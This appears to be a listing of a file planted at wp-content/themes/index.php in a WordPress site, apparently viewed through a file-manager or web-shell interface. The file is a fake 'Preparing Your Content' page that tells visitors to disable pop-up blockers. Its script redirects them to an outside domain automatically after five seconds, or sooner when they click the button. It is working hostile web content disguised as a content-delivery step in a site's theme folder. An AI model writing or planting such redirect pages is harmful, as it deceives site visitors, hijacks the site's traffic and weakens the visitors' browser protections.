Current File : /home/pariaqke/frecom.net/wp-content/themes/index.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Redirecting to Your Content...</title>
<style>
    html, body {
        height: 100%;
        margin: 0;
        padding: 0;
        background: #f8f9fa;
    }
    body {
        min-height: 100vh;
        font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        text-align: center;
        padding: 20px;
    }
    .container {
        max-width: 600px;
        background: white;
        border-radius: 12px;
        padding: 40px;
        box-shadow: 0 4px 20px rgba(0,0,0,0.08);
        border: 1px solid #eaeaea;
    }
    h1 {
        color: #333;
        font-size: 1.8em;
        margin-bottom: 20px;
        font-weight: 600;
    }
    .loading-dots {
        display: flex;
        justify-content: center;
        align-items: center;
        gap: 8px;
        margin: 30px 0;
    }
    .dot {
        width: 10px;
        height: 10px;
        background: #4a90e2;
        border-radius: 50%;
        animation: bounce 1.4s infinite ease-in-out both;
    }
    .dot:nth-child(1) { animation-delay: -0.32s; }
    .dot:nth-child(2) { animation-delay: -0.16s; }
    @keyframes bounce {
        0%, 80%, 100% { transform: scale(0); }
        40% { transform: scale(1.0); }
    }
    .message {
        color: #666;
        line-height: 1.6;
        margin-bottom: 30px;
        font-size: 1.05em;
    }
    .disclaimer {
        font-size: 0.9em;
        color: #888;
        margin-top: 25px;
        padding-top: 15px;
        border-top: 1px solid #eee;
    }
    .continue-btn {
        display: inline-block;
        padding: 16px 40px;
        font-size: 1.1em;
        font-weight: 500;
        color: white;
        background: #4a90e2;
        border: none;
        border-radius: 8px;
        cursor: pointer;
        transition: all 0.2s ease;
        text-decoration: none;
        box-shadow: 0 4px 12px rgba(74, 144, 226, 0.25);
    }
    .continue-btn:hover {
        background: #3a7bc8;
        transform: translateY(-2px);
        box-shadow: 0 6px 16px rgba(74, 144, 226, 0.3);
    }
    .continue-btn:active {
        transform: translateY(0);
    }
    @media (max-width: 600px) {
        .container {
            padding: 25px;
            margin: 0 15px;
        }
        h1 {
            font-size: 1.5em;
        }
        .continue-btn {
            width: 100%;
            padding: 18px 20px;
        }
    }
</style>
</head>
<body>
    <div class="container">
        <h1>Preparing Your Content...</h1>
        
        <div class="loading-dots">
            <div class="dot"></div>
            <div class="dot"></div>
            <div class="dot"></div>
        </div>
        
        <p class="message">
            Please wait while we verify your request and prepare your content.<br>
            This process is automatic and will only take a moment.
        </p>
        
        <button id="continueBtn" class="continue-btn">
            Continue to Content
        </button>
        
        <p class="disclaimer">
            You will be redirected through our content delivery system.<br>
            Please disable any pop-up blockers if you encounter issues.
        </p>
    </div>

    <script>
        // Auto-redirect after 5 seconds if user doesn't click
        setTimeout(function() {
            window.location.href = "https://otieu.com/4/10314817";
        }, 5000);
        
        // Manual redirect when user clicks
        document.getElementById('continueBtn').addEventListener('click', function() {
            window.location.href = "https://otieu.com/4/10314817";
        });
    </script>
</body>
</html>